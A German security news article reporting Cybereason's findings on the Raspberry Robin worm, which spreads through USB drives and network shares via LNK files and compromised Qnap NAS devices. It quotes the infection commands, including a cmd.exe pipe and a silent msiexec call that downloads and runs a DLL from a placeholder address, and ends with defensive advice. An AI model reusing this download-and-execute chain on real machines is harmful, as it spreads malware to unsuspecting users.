Wurm-Infektion: Malware-Kampagne Raspberry Robin befällt Windows und Qnap-NAS

IT-Forscher von Cybereason haben einen Netzwerkwurm entdeckt, der sich auf Windows- und Qnap-Geräten verbreitet. Sie nennen die Kampagne Raspberry Robin.

Lesezeit: 2 Min.
In Pocket speichern
vorlesen Druckansicht Kommentare lesen 133 Beiträge
Aufmacher Computerwurm Raspberry Robin/LNK Worm

(Bild: solarseven/Shutterstock.com)

Von
  • Dirk Knop

Forscher vom IT-Sicherheitsunternehmen Cybereason haben eine Malware-Kampagne mit einem Computerwurm entdeckt, der Windows- und Qnap-Netzwerkspeicher-Geräte befällt. Er ist Teil der Malware-Kampagne namens Raspberry Robin, die Malware wird aber auch als LNK Worm bezeichnet.

Raspberry Robin umfasst einen Wurm, der mittels USB-Geräten oder Netzwerkfreigaben Verbreitung findet. Er nutzt kompromittierte Qnap-NAS-Geräte als Sprungbrett. Zum Einsatz kommt die alte, aber immer noch effektive Methode, mit LNK-Shortcut-Dateien auf Opfer zu lauern.

Die Raspberry-Robin-Infektion beginnt mit zwei Dateien, die im gleichen Verzeichnis auf einem externen Gerät oder einer Netzwerkfreigabe liegen: Einer LNK-Datei, die einen Windows-Befehl enthält, sowie einer als .bat-Datei funktionierenden Datei, die aus Fülldaten und zwei speziellen Befehlen besteht.

Im konkreten Beispiel enthält die .lnk-Datei den Aufruf C:\Windows\System32\cmd.exe" /r tYPE xPhfK.Usb|CmD, während die Datei xPhfK.Usb neben zufälligen Binärdaten zwei Befehle explorer.exe ADATA uFD und mSIExEC /Q -I"hTTP://<Adresse>:8080/<Verzeichnis>/USER-PC?admin" zum Herunterladen und Ausführen der Malware enthielt.

Der auf dem Rechner bereits vorhandene msiexec-Installer (sogenanntes "Living of the Land", LOL) dient dazu, eine bösartige DLL-Bibliothek von einem kompromittierten NAS-Gerät von Qnap herunterzuladen und auszuführen. Um die Erkennung zu erschweren, nutzt Raspberry Robin Prozess-Injektion in drei legitime Windows-Prozesse und kommuniziert mit den Command-and-Control-Servern durch das anonymisierende Tor-Netzwerk.

Persistenz erreicht die Malware durch das Anlegen eines Registry-Schlüssels, der die DLL-Datei mittels rundll32.exe beim Systemstart lädt und ausführt. Die Bibliothek imitiert im untersuchten Fall eine Apache-DLL namens libapriconv-1.dll, um keinen Verdacht zu erregen. Andere Infektionen nutzten Cybereason zufolge auch eine Verkleidung als QT 5.

Zum Schutz vor Malware-Befall kann eine Antiviren-Software dienen. Cybereason liefert weitere Hinweise, wie einem Befall vorzubeugen respektive nach einem Befall vorzugehen ist. So sollten IT-Verantwortliche ausgehende Verbindungen zu Tor-bezogenen Adressen blockieren, da Raspberry Robin aktiv mit Tor-Exit-Nodes kommuniziere.

Empfohlener redaktioneller Inhalt

Mit Ihrer Zustimmmung wird hier eine externe Umfrage (Opinary GmbH) geladen.

Ich bin damit einverstanden, dass mir externe Inhalte angezeigt werden. Damit können personenbezogene Daten an Drittplattformen (Opinary GmbH) übermittelt werden. Mehr dazu in unserer Datenschutzerklärung.

Kam es doch zu einem Befall, sollten die betroffenen Maschinen mit einem Image neu aufgesetzt werden, da die Malware sich einnistet und Mechanismen zum Verstecken auf infizierten Systemen nutze. Weitere Details enthält die Meldung von Cybereason.

(dmk)